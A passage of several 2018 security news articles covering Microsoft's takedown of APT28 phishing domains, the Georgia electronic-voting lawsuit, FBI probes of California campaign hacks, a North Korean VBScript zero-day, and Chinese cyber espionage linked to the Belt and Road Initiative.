While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly who the hackers intended on targeting using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 2018 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.

Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.2018 securityweek BigBrothers

The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia found that “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although not one of the perennial swing votes, these midterms are likely to be different, and a relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. It does not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the elections.kennesaw.edu server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU elections.kennesaw.edu server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [Demillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich Demillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at -- a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.

FBI Probes Computer Hacks in California House Campaigns
22.8.2018 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that many attempts to gain access to a site hosted with the popular and free WordPress software is not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.

Russian Hackers Went After Conservative US Groups: Microsoft
22.8.2018 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites involved in such efforts, which also involved a site that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have people think they were accessing links managed by these US political groups but redirect them to fake ones run by the hackers so passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What are the basis of such serious accusations? They should not be raised without some foundation," he told journalists.

Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.2018 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations — potential cyberespionage honey pots— that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

As industry leaders, Microsoft's Windows operating systems had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets, collections of compromised computers used as tools for financial crimes and denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting 2018 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at Members of United States’ Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and operates under the Russian military agency GRU and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.

APT28 fake domains

Three bogus domains were created to appear as legitimate sites belonging to U.S. Senate, a fourth non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months, hackers registered them with major web-hosting companies.

2018 midterm elections fake election websites
Microsoft did not provide further details on the attacks.

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
At the time it is not possible to say if the fake attacks allowed the cyberspies to compromise the visitors’ machines, Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft shut down dozens of other fake websites since 2016 after it has obtained the authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt hacking into US politics and for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

The discovery made by Microsoft is part of the Microsoft’s Defending Democracy Program launched in April that is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft announced also its initiative AccountGuard that provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

North Korean Hackers Exploit Recently Patched Zero-Day
21.8.2018 securityweek  BigBrothers  

North Koren hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine vulnerability in live attacks, security researchers say.

Tracked as CVE-2018-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

Impacting the VBScript engine in the latest versions of Windows, the vulnerability does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” Trend Micro, the security firm that discovered the flaw last month, says.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-2018-8373 and running shellcode is also similar to the CVE-2018-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-2018-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-2018-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.

China Believes Its Cyber Capabilities Lag Behind US: Pentagon
21.8.2018 securityweek BigBrothers

China believes its cyberwarfare capabilities lag behind the United States, but it’s working on closing the gap, according to the U.S. Department of Defense (DOD).

In its annual report to Congress, the Pentagon describes the cyber capabilities and cyber operations of the People's Liberation Army (PLA), and warns that China continues to launch cyberattacks against organizations around the world, including in the United States.

The PLA sees cyberspace as one of the four critical security domains and it has taken steps to make improvements in this area, the report says.

“China believes its cyber capabilities and personnel lag behind the United States and is working to improve training and bolster domestic innovation to overcome these perceived deficiencies and advance cyberspace operations,” the Pentagon noted.

One of the steps taken by the PLA in an effort to improve its cyber capabilities is the creation of the Strategic Support Force (SSF). Believed to have been established in 2015, the SSF’s role is to centralize the military’s space, cyber and electronic warfare missions.

“The establishment of the SSF may represent the first step in developing a cyber force that creates efficiencies by combining cyber reconnaissance, attack, and defense capabilities into one organization,” the report reads. “PLA writings acknowledge the benefits of unifying leadership, centralizing cyber resource management, and combining offensive and defensive cyber capabilities in one military organization, and cite U.S. Cyber Command as accomplishing such a consolidation.”

According to the Pentagon, the Chinese military distinguishes between wartime and peacetime cyber operations. The former focuses on helping the PLA understand its enemy’s trend, plan combat operations, and “ensure victory on the battlefield.” During peacetime, the focus is on defending cyberspace and electromagnetic space.

“[PLA writings] suggest that China is prepared to use cyber operations to manage the escalation of a conflict, as they view cyber operations as a low-cost deterrent and can demonstrate capabilities and resolve to an adversary,” the DoD says.

The Chinese military’s cyber warfare strategy involves targeting an adversary’s command and control (C&C) and logistics networks in an effort to disrupt its ability to operate. The PLA noted that attacking C&C systems has the potentially to paralyze the enemy and gain superiority on the battlefield.

“Accordingly, the PLA may seek to use its cyberwarfare capabilities to collect data for intelligence and cyber attack purposes; to constrain an adversary’s actions by targeting network-based logistics, communications, and commercial activities; or to serve as a force- multiplier when coupled with kinetic attacks during times of crisis or conflict,” the report says.

Threat actors based in China continued to target computers around the world through 2017, including systems belonging to the DOD and other U.S. government agencies, with a focus on accessing networks and extracting information.

“China can use the information to benefit China’s defense high-technology industries, support China’s military modernization, provide the [Chinese Communist Party] insights into U.S. leadership perspectives, and enable diplomatic negotiations, such as those supporting China’s Belt and Road Initiative,” the DOD says in its report. “Additionally, targeted information could enable PLA cyber forces to build an operational picture of U.S. defense networks, military disposition, logistics, and related military capabilities that could be exploited prior to or during a crisis. The accesses and skills required for these intrusions are similar to those necessary to conduct cyber operations in an attempt to deter, delay, disrupt, and degrade DoD operations prior to or during a conflict.”

China’s Belt and Road project (BRI) is a driver of regional cyber threat activity
20.8.2018 securityaffairs BigBrothers

Security experts have observed increasing cyber espionage activity related to China’s Belt and Road Initiative (BRI).
The alarm was launched by the experts from cybersecurity firms FireEye and Recorded Future.

China’s Belt and Road Initiative (BRI) is a development project for the building of an infrastructure connecting countries in Southeast Asia, Central Asia, the Middle East, Europe, and Africa.

For this reason, the project is considered strategic for almost any intelligence Agency.

FireEye defined it as a “driver of regional cyber threat activity”, experts warn of a spike in espionage operations aimed at gathering info in the project.

Cyber spies are already targeting organizations from various sectors that are involved in the project.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” reads a report published by FireEye.

FireEye uncovered an espionage campaign carried out by the China-linked APT group dubbed Roaming Tiger.

The Roaming Tiger campaign was discovered by experts at ESET in 2014, in December 2015 experts uncovered a cyber espionage campaign aimed at Russian organizations.

The APT group targeted entities in Belarus using specially crafted documents that referenced the Chinese infrastructure project as a bait.

FireEye observed the use of several malicious codes against organizations involved in the BRI project.

Chinese hackers used the TOYSNAKE backdoor to target several European foreign ministries. According to FireEye, another malware tracked as BANECHANT was used to target Maldives, a strategic center for financial investments related to BRI, meanwhile the LITRECOLA malware was used in attacks against Cambodia and the SAFERSING malware was involved in campaigns against international NGOs.

Experts also mentioned the recent attacks powered by the TEMP.Periscope group on the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

Researchers at Recorded Future also reported several attacks originating from China, precisely from the Tsinghua University.

The hackers targeted Tibetan community and many governments and private sector organizations worldwide.

The attacks launched from the Tsinghua University targeted Mongolia, Kenya, and Brazil, that “are key investment destinations as part of China’s Belt and Road Initiative.”

“During the course of our research, we also observed the Tsinghua IP scan ports and probe government departments and commercial entities networks in Mongolia, Kenya, and Brazil. Each of these countries are key investment destinations as part of China’s Belt and Road Initiative.” states the report published by Recorded Future.

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,”


The appendix in the PDF report published by Recorded Future includes a full list of the associated indicators of compromise.

China's 'Belt and Road Initiative' Drives Cyber Spying
17.8.2018 securityweek BigBrothers

Cybersecurity firms have observed increasing cyber espionage activity related to China’s Belt and Road Initiative, and researchers expect to see more of these operations in the upcoming period.

China’s Belt and Road Initiative (BRI) is a trillion-dollar development project focused on building infrastructure connecting roughly 70 countries across Asia, Europe and Africa.

Intelligence-focused cybersecurity firms Recorded Future and FireEye this week warned of attacks apparently coming from China and related to the BRI.

FireEye believes that the project will be a “driver of regional cyber threat activity”. Based on historic activity, the company expects threat actors to target organizations in the government, academic, energy, transportation, construction, manufacturing, mining and financial sectors.

FireEye says it has already seen evidence of an increase in cyber espionage operations related to the BRI.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” FireEye said in a report provided to customers and shared with SecurityWeek.

One of the campaigns spotted by FireEye that may be related to the BRI was conducted by a China-linked threat group dubbed Roaming Tiger, which has been known to target high profile organizations in Russia and former Soviet Union countries. Some recent Roaming Tiger attacks aimed at Belarus attempted to deliver malware using specially crafted documents that referenced the Chinese infrastructure project. Belarus is one of the countries targeted by the Belt and Road Initiative.

Other China-linked campaigns observed by FireEye that appear related to the BRI involved the TOYSNAKE backdoor targeting multiple European foreign ministries; the BANECHANT malware targeting Maldives, which has been a focal point of development and financial investments related to BRI; the LITRECOLA malware targeting Cambodia, which is a vital node in the Belt and Road network; the SAFERSING malware targeting international NGOs; and the TEMP.Periscope group targeting the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

A report published on Thursday by Recorded Future details several attack campaigns apparently originating from the Tsinghua University, an elite Chinese academic institution.

The attacks have been aimed at the Tibetan community and various government and private sector organizations around the world.

Researchers noted that some of the countries targeted in attacks originating from this university, specifically Mongolia, Kenya, and Brazil, “are key investment destinations as part of China’s Belt and Road Initiative.”

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,” Recorded Future said in its report.

U.S. and Chile Agree to Cooperate on Cyber Security
